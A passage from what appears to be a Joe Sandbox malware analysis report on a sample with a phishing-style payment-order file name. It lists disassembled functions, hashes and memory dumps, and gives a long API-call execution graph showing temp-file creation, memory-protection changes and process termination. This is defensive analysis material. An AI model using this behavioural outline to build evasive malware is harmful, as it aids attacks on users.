                                                                                                                                                                                                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                                                                                                                                          Function 00405CB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CC6
                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CDE
                                                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CEF
                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                                                                          • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                                                                          • Instruction ID: 3ccce89ec89fcd17ace6fe24ed26798b8253689363ac01c92f586b0f3661b096
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81F0F631204958FFC7029FA8DD04D9FBBA8EF16354B2540BAE840F7211D634EE01ABA8

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:3%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:96.5%
                                                                                                                                                                                                                                          Signature Coverage:1.8%
                                                                                                                                                                                                                                          Total number of Nodes:1706
                                                                                                                                                                                                                                          Total number of Limit Nodes:5
                                                                                                                                                                                                                                          execution_graph 5952 34f463f0 5953 34f46400 5952->5953 5957 34f46416 5952->5957 5954 34f46368 20 API calls 5953->5954 5955 34f46405 5954->5955 5971 34f462ac 5955->5971 5963 34f46561 5957->5963 5964 34f46480 5957->5964 5974 34f46580 5957->5974 5959 34f464e5 5961 34f464ee 5959->5961 5968 34f46573 5959->5968 5991 34f485eb 5959->5991 5962 34f4571e 20 API calls 5961->5962 5962->5963 6000 34f4679a 5963->6000 5985 34f44e76 5964->5985 5967 34f4640f 6006 34f462bc IsProcessorFeaturePresent 5968->6006 5970 34f4657f 6010 34f46231 5971->6010 5973 34f462b8 5973->5967 5975 34f4658c 5974->5975 5975->5975 5976 34f4637b 20 API calls 5975->5976 5977 34f465ba 5976->5977 5978 34f485eb 26 API calls 5977->5978 5979 34f465e6 5978->5979 5980 34f462bc 11 API calls 5979->5980 5981 34f46615 5980->5981 5982 34f466b6 FindFirstFileExA 5981->5982 5983 34f46705 5982->5983 5984 34f46580 26 API calls 5983->5984 5986 34f44e8b 5985->5986 5987 34f44e87 5985->5987 5986->5987 5988 34f4637b 20 API calls 5986->5988 5987->5959 5989 34f44eb9 5988->5989 5990 34f4571e 20 API calls 5989->5990 5990->5987 5994 34f4853a 5991->5994 5992 34f4854f 5993 34f48554 5992->5993 5995 34f46368 20 API calls 5992->5995 5993->5959 5994->5992 5994->5993 5998 34f4858b 5994->5998 5996 34f4857a 5995->5996 5997 34f462ac 26 API calls 5996->5997 5997->5993 5998->5993 5999 34f46368 20 API calls 5998->5999 5999->5996 6001 34f467a4 6000->6001 6002 34f467b4 6001->6002 6003 34f4571e 20 API calls 6001->6003 6004 34f4571e 20 API calls 6002->6004 6003->6001 6005 34f467bb 6004->6005 6005->5967 6007 34f462c7 6006->6007 6021 34f460e2 6007->6021 6011 34f45b7a 20 API calls 6010->6011 6012 34f46247 6011->6012 6013 34f46255 6012->6013 6014 34f462a6 6012->6014 6019 34f42ada 5 API calls 6013->6019 6015 34f462bc 11 API calls 6014->6015 6016 34f462ab 6015->6016 6017 34f46231 26 API calls 6016->6017 6018 34f462b8 6017->6018 6018->5973 6020 34f4627c 6019->6020 6020->5973 6022 34f460fe 6021->6022 6023 34f4612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6022->6023 6024 34f461fb 6023->6024 6025 34f42ada 5 API calls 6024->6025 6026 34f46219 GetCurrentProcess TerminateProcess 6025->6026 6026->5970 6921 34f43370 6932 34f43330 6921->6932 6933 34f43342 6932->6933 6934 34f4334f 6932->6934 6935 34f42ada 5 API calls 6933->6935 6935->6934 7439 34f45630 7440 34f4563b 7439->7440 7441 34f45eb7 11 API calls 7440->7441 7442 34f45664 7440->7442 7444 34f45660 7440->7444 7441->7440 7445 34f45688 7442->7445 7446 34f456b4 7445->7446 7447 34f45695 7445->7447 7446->7444 7448 34f4569f RtlDeleteCriticalSection 7447->7448 7448->7446 7448->7448 7449 34f4af31 CreateFileW 6806 34f43eb3 6809 34f45411 6806->6809 6810 34f4541d 6809->6810 6811 34f45af6 38 API calls 6810->6811 6814 34f45422 6811->6814 6812 34f455a8 38 API calls 6813 34f4544c 6812->6813 6814->6812 7450 34f4543d 7451 34f45440 7450->7451 7452 34f455a8 38 API calls 7451->7452 7453 34f4544c 7452->7453 6027 34f45bff 6035 34f45d5c 6027->6035 6030 34f45b7a 20 API calls 6031 34f45c1b 6030->6031 6032 34f45c28 6031->6032 6042 34f45c2b 6031->6042 6034 34f45c13 6036 34f45c45 5 API calls 6035->6036 6037 34f45d83 6036->6037 6038 34f45d9b TlsAlloc 6037->6038 6039 34f45d8c 6037->6039 6038->6039 6040 34f42ada 5 API calls 6039->6040 6041 34f45c09 6040->6041 6041->6030 6041->6034 6043 34f45c35 6042->6043 6044 34f45c3b 6042->6044 6046 34f45db2 6043->6046 6044->6034 6047 34f45c45 5 API calls 6046->6047 6048 34f45dd9 6047->6048 6049 34f45df1 TlsFree 6048->6049 6050 34f45de5 6048->6050 6049->6050 6051 34f42ada 5 API calls 6050->6051 6052 34f45e02 6051->6052 6052->6044 6815 34f467bf 6820 34f467f4 6815->6820 6818 34f4571e 20 API calls 6819 34f467db 6818->6819 6821 34f46806 6820->6821 6822 34f467cd 6820->6822 6823 34f46836 6821->6823 6824 34f4680b 6821->6824 6822->6818 6822->6819 6823->6822 6831 34f471d6 6823->6831 6825 34f4637b 20 API calls 6824->6825 6827 34f46814 6825->6827 6829 34f4571e 20 API calls 6827->6829 6828 34f46851 6830 34f4571e 20 API calls 6828->6830 6829->6822 6830->6822 6832 34f471e1 6831->6832 6833 34f47209 6832->6833 6835 34f471fa 6832->6835 6834 34f47218 6833->6834 6840 34f48a98 6833->6840 6847 34f48acb 6834->6847 6836 34f46368 20 API calls 6835->6836 6839 34f471ff 6836->6839 6839->6828 6841 34f48aa3 6840->6841 6842 34f48ab8 RtlSizeHeap 6840->6842 6843 34f46368 20 API calls 6841->6843 6842->6834 6844 34f48aa8 6843->6844 6845 34f462ac 26 API calls 6844->6845 6846 34f48ab3 6845->6846 6846->6834 6848 34f48ae3 6847->6848 6849 34f48ad8 6847->6849 6850 34f48aeb 6848->6850 6857 34f48af4 6848->6857 6851 34f456d0 21 API calls 6849->6851 6852 34f4571e 20 API calls 6850->6852 6855 34f48ae0 6851->6855 6852->6855 6853 34f48b1e RtlReAllocateHeap 6853->6855 6853->6857 6854 34f48af9 6856 34f46368 20 API calls 6854->6856 6855->6839 6856->6855 6857->6853 6857->6854 6858 34f4474f 7 API calls 6857->6858 6858->6857 6053 403350 SetErrorMode GetVersion 6054 4033a0 6053->6054 6077 4065c9 GetSystemDirectoryW 6054->6077 6056 4033ab lstrlenA 6056->6054 6057 4033bb 6056->6057 6080 406639 GetModuleHandleA 6057->6080 6060 406639 5 API calls 6061 4033c9 6060->6061 6062 406639 5 API calls 6061->6062 6063 4033d5 #17 OleInitialize SHGetFileInfoW 6062->6063 6086 40625f lstrcpynW 6063->6086 6066 403421 GetCommandLineW 6087 40625f lstrcpynW 6066->6087 6068 403433 GetModuleHandleW 6069 403453 6068->6069 6088 405b5d 6069->6088 6072 403584 GetTempPathW 6092 40331f 6072->6092 6074 40359c DeleteFileW 6076 402ec1 6074->6076 6078 4065eb wsprintfW LoadLibraryExW 6077->6078 6078->6056 6081 406655 6080->6081 6082 40665f GetProcAddress 6080->6082 6083 4065c9 3 API calls 6081->6083 6084 4033c2 6082->6084 6085 40665b 6083->6085 6084->6060 6085->6082 6085->6084 6086->6066 6087->6068 6089 405b63 6088->6089 6090 40345a CharNextW 6089->6090 6091 405b6a CharNextW 6089->6091 6090->6072 6091->6089 6102 4064f3 6092->6102 6094 403335 6094->6074 6095 40332b 6095->6094 6111 405b30 lstrlenW CharPrevW 6095->6111 6103 406500 6102->6103 6105 406576 6103->6105 6106 406569 CharNextW 6103->6106 6108 405b5d CharNextW 6103->6108 6109 406555 CharNextW 6103->6109 6110 406564 CharNextW 6103->6110 6104 40657b CharPrevW 6104->6105 6105->6104 6107 40659c 6105->6107 6106->6103 6106->6105 6107->6095 6108->6103 6109->6103 6110->6106 6112 40333d 6111->6112 6113 405b4c lstrcatW 6111->6113 6114 40580f CreateDirectoryW 6112->6114 6113->6112 6115 405823 GetLastError 6114->6115 6116 403343 6114->6116 6115->6116 6117 405d80 6116->6117 6118 405d8d GetTickCount GetTempFileNameW 6117->6118 6119 40334e 6118->6119 6120 405dc3 6118->6120 6119->6074 6120->6118 6120->6119 6121 405d51 GetFileAttributesW CreateFileW 5722 2d41207 5725 2d41242 5722->5725 5723 2d41265 Sleep 5723->5722 5724 2d41273 NtProtectVirtualMemory 5724->5725 5725->5722 5725->5723 5725->5724 6122 34f4a1e0 6125 34f4a1fe 6122->6125 6124 34f4a1f6 6129 34f4a203 6125->6129 6128 34f4a298 6128->6124 6129->6128 6130 34f4aa53 6129->6130 6131 34f4aa70 RtlDecodePointer 6130->6131 6132 34f4aa80 6130->6132 6131->6132 6133 34f4ab0d 6132->6133 6136 34f4ab02 6132->6136 6138 34f4aab7 6132->6138 6133->6136 6137 34f46368 20 API calls 6133->6137 6134 34f42ada 5 API calls 6135 34f4a42f 6134->6135 6135->6124 6136->6134 6137->6136 6138->6136 6139 34f46368 20 API calls 6138->6139 6139->6136 6859 34f481a0 6860 34f481d9 6859->6860 6861 34f481dd 6860->6861 6872 34f48205 6860->6872 6862 34f46368 20 API calls 6861->6862 6863 34f481e2 6862->6863 6865 34f462ac 26 API calls 6863->6865 6864 34f48529 6866 34f42ada 5 API calls 6864->6866 6867 34f481ed 6865->6867 6868 34f48536 6866->6868 6869 34f42ada 5 API calls 6867->6869 6870 34f481f9 6869->6870 6872->6864 6873 34f480c0 6872->6873 6876 34f480db 6873->6876 6874 34f42ada 5 API calls 6875 34f48152 6874->6875 6875->6872 6876->6874 6936 34f47260 GetStartupInfoW 6937 34f47286 6936->6937 6938 34f47318 6936->6938 6937->6938 6939 34f48be3 27 API calls 6937->6939 6940 34f472af 6939->6940 6940->6938 6941 34f472dd GetFileType 6940->6941 6941->6940 6877 34f421a1 6880 34f42418 6877->6880 6882 34f42420 6880->6882 6884 34f447f5 6882->6884 6883 34f421bc 6885 34f44804 6884->6885 6886 34f44808 6884->6886 6885->6883 6889 34f44815 6886->6889 6890 34f45b7a 20 API calls 6889->6890 6893 34f4482c 6890->6893 6891 34f42ada 5 API calls 6892 34f44811 6891->6892 6892->6883 6893->6891 6894 34f460ac 6895 34f460dd 6894->6895 6897 34f460b7 6894->6897 6896 34f460c7 FreeLibrary 6896->6897 6897->6895 6897->6896 6942 34f4506f 6943 34f45081 6942->6943 6944 34f45087 6942->6944 6945 34f45000 20 API calls 6943->6945 6945->6944 6946 34f4ac6b 6947 34f4ac84 6946->6947 6949 34f4acad 6947->6949 6950 34f4b2f0 6947->6950 6951 34f4b329 6950->6951 6953 34f4b350 6951->6953 6961 34f4b5c1 6951->6961 6954 34f4b393 6953->6954 6955 34f4b36e 6953->6955 6974 34f4b8b2 6954->6974 6965 34f4b8e1 6955->6965 6958 34f4b38e 6959 34f42ada 5 API calls 6958->6959 6960 34f4b3b7 6959->6960 6960->6949 6962 34f4b5ec 6961->6962 6963 34f4b7e5 RaiseException 6962->6963 6964 34f4b7fd 6963->6964 6964->6953 6966 34f4b8f0 6965->6966 6967 34f4b964 6966->6967 6968 34f4b90f 6966->6968 6969 34f4b8b2 20 API calls 6967->6969 6981 34f478a3 6968->6981 6973 34f4b95d 6969->6973 6972 34f4b8b2 20 API calls 6972->6973 6973->6958 6975 34f4b8d4 6974->6975 6976 34f4b8bf 6974->6976 6978 34f46368 20 API calls 6975->6978 6977 34f4b8d9 6976->6977 6979 34f46368 20 API calls 6976->6979 6977->6958 6978->6977 6980 34f4b8cc 6979->6980 6980->6958 6982 34f478cb 6981->6982 6983 34f42ada 5 API calls 6982->6983 6984 34f478e8 6983->6984 6984->6972 6984->6973 6985 34f49e6b 6986 34f49e7d 6985->6986 6987 34f49f71 6985->6987 6986->6987 6988 34f49ee6 6986->6988 6991 34f4b2f0 21 API calls 6987->6991 6992 34f4acad 6987->6992 6989 34f49ef8 6988->6989 6990 34f4aa53 21 API calls 6988->6990 6990->6989 6991->6992 7454 34f4742b 7457 34f47430 7454->7457 7456 34f47453 7457->7456 7458 34f48bae 7457->7458 7459 34f48bdd 7458->7459 7460 34f48bbb 7458->7460 7459->7457 7461 34f48bd7 7460->7461 7462 34f48bc9 RtlDeleteCriticalSection 7460->7462 7463 34f4571e 20 API calls 7461->7463 7462->7461 7462->7462 7463->7459 6140 34f473d5 6141 34f473e1 6140->6141 6152 34f45671 RtlEnterCriticalSection 6141->6152 6143 34f473e8 6153 34f48be3 6143->6153 6145 34f473f7 6151 34f47406 6145->6151 6166 34f47269 GetStartupInfoW 6145->6166 6150 34f47417 6177 34f47422 6151->6177 6152->6143 6154 34f48bef 6153->6154 6155 34f48c13 6154->6155 6156 34f48bfc 6154->6156 6180 34f45671 RtlEnterCriticalSection 6155->6180 6157 34f46368 20 API calls 6156->6157 6159 34f48c01 6157->6159 6160 34f462ac 26 API calls 6159->6160 6161 34f48c0b 6160->6161 6161->6145 6162 34f48c4b 6188 34f48c72 6162->6188 6163 34f48c1f 6163->6162 6181 34f48b34 6163->6181 6167 34f47286 6166->6167 6168 34f47318 6166->6168 6167->6168 6169 34f48be3 27 API calls 6167->6169 6172 34f4731f 6168->6172 6170 34f472af 6169->6170 6170->6168 6171 34f472dd GetFileType 6170->6171 6171->6170 6173 34f47326 6172->6173 6174 34f47369 GetStdHandle 6173->6174 6175 34f473d1 6173->6175 6176 34f4737c GetFileType 6173->6176 6174->6173 6175->6151 6176->6173 6199 34f456b9 RtlLeaveCriticalSection 6177->6199 6179 34f47429 6179->6150 6180->6163 6182 34f4637b 20 API calls 6181->6182 6183 34f48b46 6182->6183 6187 34f48b53 6183->6187 6191 34f45eb7 6183->6191 6184 34f4571e 20 API calls 6186 34f48ba5 6184->6186 6186->6163 6187->6184 6198 34f456b9 RtlLeaveCriticalSection 6188->6198 6190 34f48c79 6190->6161 6192 34f45c45 5 API calls 6191->6192 6193 34f45ede 6192->6193 6194 34f45efc InitializeCriticalSectionAndSpinCount 6193->6194 6197 34f45ee7 6193->6197 6194->6197 6195 34f42ada 5 API calls 6196 34f45f13 6195->6196 6196->6183 6197->6195 6198->6190 6199->6179 6200 34f44ed7 6211 34f46d60 6200->6211 6205 34f44ef4 6207 34f4571e 20 API calls 6205->6207 6208 34f44f29 6207->6208 6209 34f44eff 6210 34f4571e 20 API calls 6209->6210 6210->6205 6212 34f46d69 6211->6212 6214 34f44ee9 6211->6214 6244 34f46c5f 6212->6244 6215 34f47153 GetEnvironmentStringsW 6214->6215 6216 34f4716a 6215->6216 6226 34f471bd 6215->6226 6219 34f47170 WideCharToMultiByte 6216->6219 6217 34f471c6 FreeEnvironmentStringsW 6218 34f44eee 6217->6218 6218->6205 6227 34f44f2f 6218->6227 6220 34f4718c 6219->6220 6219->6226 6221 34f456d0 21 API calls 6220->6221 6222 34f47192 6221->6222 6223 34f471af 6222->6223 6224 34f47199 WideCharToMultiByte 6222->6224 6225 34f4571e 20 API calls 6223->6225 6224->6223 6225->6226 6226->6217 6226->6218 6228 34f44f44 6227->6228 6229 34f4637b 20 API calls 6228->6229 6238 34f44f6b 6229->6238 6230 34f44fcf 6231 34f4571e 20 API calls 6230->6231 6232 34f44fe9 6231->6232 6232->6209 6233 34f4637b 20 API calls 6233->6238 6234 34f44fd1 6739 34f45000 6234->6739 6238->6230 6238->6233 6238->6234 6240 34f44ff3 6238->6240 6242 34f4571e 20 API calls 6238->6242 6730 34f4544d 6238->6730 6239 34f4571e 20 API calls 6239->6230 6241 34f462bc 11 API calls 6240->6241 6243 34f44fff 6241->6243 6242->6238 6264 34f45af6 GetLastError 6244->6264 6246 34f46c6c 6284 34f46d7e 6246->6284 6248 34f46c74 6293 34f469f3 6248->6293 6251 34f46c8b 6251->6214 6254 34f46cce 6256 34f4571e 20 API calls 6254->6256 6256->6251 6258 34f46cc9 6259 34f46368 20 API calls 6258->6259 6259->6254 6260 34f46d12 6260->6254 6317 34f468c9 6260->6317 6261 34f46ce6 6261->6260 6262 34f4571e 20 API calls 6261->6262 6262->6260 6265 34f45b0c 6264->6265 6266 34f45b12 6264->6266 6267 34f45e08 11 API calls 6265->6267 6268 34f4637b 20 API calls 6266->6268 6270 34f45b61 SetLastError 6266->6270 6267->6266 6269 34f45b24 6268->6269 6271 34f45b2c 6269->6271 6272 34f45e5e 11 API calls 6269->6272 6270->6246 6273 34f4571e 20 API calls 6271->6273 6274 34f45b41 6272->6274 6275 34f45b32 6273->6275 6274->6271 6276 34f45b48 6274->6276 6278 34f45b6d SetLastError 6275->6278 6277 34f4593c 20 API calls 6276->6277 6279 34f45b53 6277->6279 6320 34f455a8 6278->6320 6281 34f4571e 20 API calls 6279->6281 6283 34f45b5a 6281->6283 6283->6270 6283->6278 6285 34f46d8a 6284->6285 6286 34f45af6 38 API calls 6285->6286 6291 34f46d94 6286->6291 6288 34f46e18 6288->6248 6290 34f455a8 38 API calls 6290->6291 6291->6288 6291->6290 6292 34f4571e 20 API calls 6291->6292 6469 34f45671 RtlEnterCriticalSection 6291->6469 6470 34f46e0f 6291->6470 6292->6291 6474 34f454a7 6293->6474 6296 34f46a14 GetOEMCP 6298 34f46a3d 6296->6298 6297 34f46a26 6297->6298 6299 34f46a2b GetACP 6297->6299 6298->6251 6300 34f456d0 6298->6300 6299->6298 6301 34f4570e 6300->6301 6305 34f456de 6300->6305 6302 34f46368 20 API calls 6301->6302 6304 34f4570c 6302->6304 6303 34f456f9 RtlAllocateHeap 6303->6304 6303->6305 6304->6254 6307 34f46e20 6304->6307 6305->6301 6305->6303 6306 34f4474f 7 API calls 6305->6306 6306->6305 6308 34f469f3 40 API calls 6307->6308 6309 34f46e3f 6308->6309 6312 34f46e90 IsValidCodePage 6309->6312 6314 34f46e46 6309->6314 6316 34f46eb5 6309->6316 6310 34f42ada 5 API calls 6311 34f46cc1 6310->6311 6311->6258 6311->6261 6313 34f46ea2 GetCPInfo 6312->6313 6312->6314 6313->6314 6313->6316 6314->6310 6621 34f46acb GetCPInfo 6316->6621 6694 34f46886 6317->6694 6319 34f468ed 6319->6254 6331 34f47613 6320->6331 6323 34f455b8 6325 34f455c2 IsProcessorFeaturePresent 6323->6325 6326 34f455e0 6323->6326 6328 34f455cd 6325->6328 6361 34f44bc1 6326->6361 6330 34f460e2 8 API calls 6328->6330 6330->6326 6364 34f47581 6331->6364 6334 34f4766e 6335 34f4767a 6334->6335 6336 34f45b7a 20 API calls 6335->6336 6340 34f476a7 6335->6340 6343 34f476a1 6335->6343 6336->6343 6337 34f476f3 6338 34f46368 20 API calls 6337->6338 6339 34f476f8 6338->6339 6341 34f462ac 26 API calls 6339->6341 6346 34f4771f 6340->6346 6378 34f45671 RtlEnterCriticalSection 6340->6378 6360 34f476d6 6341->6360 6343->6337 6343->6340 6343->6360 6348 34f4777e 6346->6348 6350 34f47776 6346->6350 6357 34f477a9 6346->6357 6379 34f456b9 RtlLeaveCriticalSection 6346->6379 6348->6357 6380 34f47665 6348->6380 6351 34f44bc1 28 API calls 6350->6351 6351->6348 6354 34f45af6 38 API calls 6358 34f4780c 6354->6358 6356 34f47665 38 API calls 6356->6357 6383 34f4782e 6357->6383 6359 34f45af6 38 API calls 6358->6359 6358->6360 6359->6360 6387 34f4bdc9 6360->6387 6391 34f4499b 6361->6391 6367 34f47527 6364->6367 6366 34f455ad 6366->6323 6366->6334 6368 34f47533 6367->6368 6373 34f45671 RtlEnterCriticalSection 6368->6373 6370 34f47541 6374 34f47575 6370->6374 6372 34f47568 6372->6366 6373->6370 6377 34f456b9 RtlLeaveCriticalSection 6374->6377 6376 34f4757f 6376->6372 6377->6376 6378->6346 6379->6350 6381 34f45af6 38 API calls 6380->6381 6382 34f4766a 6381->6382 6382->6356 6384 34f47834 6383->6384 6385 34f477fd 6383->6385 6390 34f456b9 RtlLeaveCriticalSection 6384->6390 6385->6354 6385->6358 6385->6360 6388 34f42ada 5 API calls 6387->6388 6389 34f4bdd4 6388->6389 6389->6389 6390->6385 6392 34f449a7 6391->6392 6393 34f449bf 6392->6393 6413 34f44af5 GetModuleHandleW 6392->6413 6422 34f45671 RtlEnterCriticalSection 6393->6422 6399 34f449c7 6410 34f44a65 6399->6410 6412 34f44a3c 6399->6412 6423 34f4527a 6399->6423 6401 34f44a82 6433 34f44ab4 6401->6433 6402 34f44aae 6403 34f4bdc9 5 API calls 6402->6403 6408 34f44ab3 6403->6408 6405 34f44669 5 API calls 6405->6410 6409 34f44a54 6409->6405 6430 34f44aa5 6410->6430 6412->6409 6426 34f44669 6412->6426 6414 34f449b3 6413->6414 6414->6393 6415 34f44b39 GetModuleHandleExW 6414->6415 6416 34f44b63 GetProcAddress 6415->6416 6417 34f44b78 6415->6417 6416->6417 6418 34f44b95 6417->6418 6419 34f44b8c FreeLibrary 6417->6419 6420 34f42ada 5 API calls 6418->6420 6419->6418 6421 34f44b9f 6420->6421 6421->6393 6422->6399 6441 34f45132 6423->6441 6427 34f44698 6426->6427 6428 34f42ada 5 API calls 6427->6428 6429 34f446c1 6428->6429 6429->6409 6462 34f456b9 RtlLeaveCriticalSection 6430->6462 6432 34f44a7e 6432->6401 6432->6402 6463 34f46025 6433->6463 6436 34f44ae2 6439 34f44b39 8 API calls 6436->6439 6437 34f44ac2 GetPEB 6437->6436 6438 34f44ad2 GetCurrentProcess TerminateProcess 6437->6438 6438->6436 6440 34f44aea ExitProcess 6439->6440 6444 34f450e1 6441->6444 6443 34f45156 6443->6412 6445 34f450ed 6444->6445 6452 34f45671 RtlEnterCriticalSection 6445->6452 6447 34f450fb 6453 34f4515a 6447->6453 6451 34f45119 6451->6443 6452->6447 6454 34f4517a 6453->6454 6457 34f45182 6453->6457 6455 34f42ada IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6454->6455 6456 34f45108 6455->6456 6459 34f45126 6456->6459 6457->6454 6458 34f4571e 20 API calls 6457->6458 6458->6454 6460 34f456b9 RtlLeaveCriticalSection 6459->6460 6461 34f45130 6460->6461 6461->6451 6462->6432 6464 34f4604a 6463->6464 6468 34f46040 6463->6468 6465 34f45c45 5 API calls 6464->6465 6465->6468 6466 34f42ada 5 API calls 6467 34f44abe 6466->6467 6467->6436 6467->6437 6468->6466 6469->6291 6473 34f456b9 RtlLeaveCriticalSection 6470->6473 6472 34f46e16 6472->6291 6473->6472 6475 34f454c4 6474->6475 6476 34f454ba 6474->6476 6475->6476 6477 34f45af6 38 API calls 6475->6477 6476->6296 6476->6297 6478 34f454e5 6477->6478 6482 34f47a00 6478->6482 6483 34f47a13 6482->6483 6484 34f454fe 6482->6484 6483->6484 6490 34f47f0f 6483->6490 6486 34f47a2d 6484->6486 6487 34f47a40 6486->6487 6489 34f47a55 6486->6489 6488 34f46d7e 38 API calls 6487->6488 6487->6489 6488->6489 6489->6476 6491 34f47f1b 6490->6491 6492 34f45af6 38 API calls 6491->6492 6493 34f47f24 6492->6493 6501 34f47f72 6493->6501 6502 34f45671 RtlEnterCriticalSection 6493->6502 6495 34f47f42 6503 34f47f86 6495->6503 6500 34f455a8 38 API calls 6500->6501 6501->6484 6502->6495 6504 34f47f94 6503->6504 6506 34f47f56 6503->6506 6504->6506 6510 34f47cc2 6504->6510 6507 34f47f75 6506->6507 6620 34f456b9 RtlLeaveCriticalSection 6507->6620 6509 34f47f69 6509->6500 6509->6501 6511 34f47cd8 6510->6511 6513 34f47d42 6510->6513 6511->6513 6516 34f47d0b 6511->6516 6521 34f4571e 20 API calls 6511->6521 6514 34f4571e 20 API calls 6513->6514 6537 34f47d90 6513->6537 6515 34f47d64 6514->6515 6518 34f4571e 20 API calls 6515->6518 6517 34f47d2d 6516->6517 6522 34f4571e 20 API calls 6516->6522 6520 34f4571e 20 API calls 6517->6520 6519 34f47d77 6518->6519 6523 34f4571e 20 API calls 6519->6523 6524 34f47d37 6520->6524 6526 34f47d00 6521->6526 6528 34f47d22 6522->6528 6529 34f47d85 6523->6529 6530 34f4571e 20 API calls 6524->6530 6525 34f47dfe 6531 34f4571e 20 API calls 6525->6531 6538 34f490ba 6526->6538 6527 34f47d9e 6527->6525 6535 34f4571e 20 API calls 6527->6535 6566 34f491b8 6528->6566 6534 34f4571e 20 API calls 6529->6534 6530->6513 6536 34f47e04 6531->6536 6534->6537 6535->6527 6536->6506 6578 34f47e35 6537->6578 6539 34f490cb 6538->6539 6565 34f491b4 6538->6565 6540 34f490dc 6539->6540 6541 34f4571e 20 API calls 6539->6541 6542 34f490ee 6540->6542 6544 34f4571e 20 API calls 6540->6544 6541->6540 6543 34f49100 6542->6543 6545 34f4571e 20 API calls 6542->6545 6546 34f49112 6543->6546 6547 34f4571e 20 API calls 6543->6547 6544->6542 6545->6543 6548 34f4571e 20 API calls 6546->6548 6549 34f49124 6546->6549 6547->6546 6548->6549 6550 34f4571e 20 API calls 6549->6550 6554 34f49136 6549->6554 6550->6554 6551 34f4571e 20 API calls 6552 34f49148 6551->6552 6553 34f4915a 6552->6553 6555 34f4571e 20 API calls 6552->6555 6556 34f4916c 6553->6556 6557 34f4571e 20 API calls 6553->6557 6554->6551 6554->6552 6555->6553 6558 34f4917e 6556->6558 6560 34f4571e 20 API calls 6556->6560 6557->6556 6559 34f49190 6558->6559 6561 34f4571e 20 API calls 6558->6561 6562 34f491a2 6559->6562 6563 34f4571e 20 API calls 6559->6563 6560->6558 6561->6559 6564 34f4571e 20 API calls 6562->6564 6562->6565 6563->6562 6564->6565 6565->6516 6567 34f491c5 6566->6567 6577 34f4921d 6566->6577 6568 34f491d5 6567->6568 6569 34f4571e 20 API calls 6567->6569 6570 34f491e7 6568->6570 6571 34f4571e 20 API calls 6568->6571 6569->6568 6572 34f491f9 6570->6572 6573 34f4571e 20 API calls 6570->6573 6571->6570 6574 34f4571e 20 API calls 6572->6574 6575 34f4920b 6572->6575 6573->6572 6574->6575 6576 34f4571e 20 API calls 6575->6576 6575->6577 6576->6577 6577->6517 6579 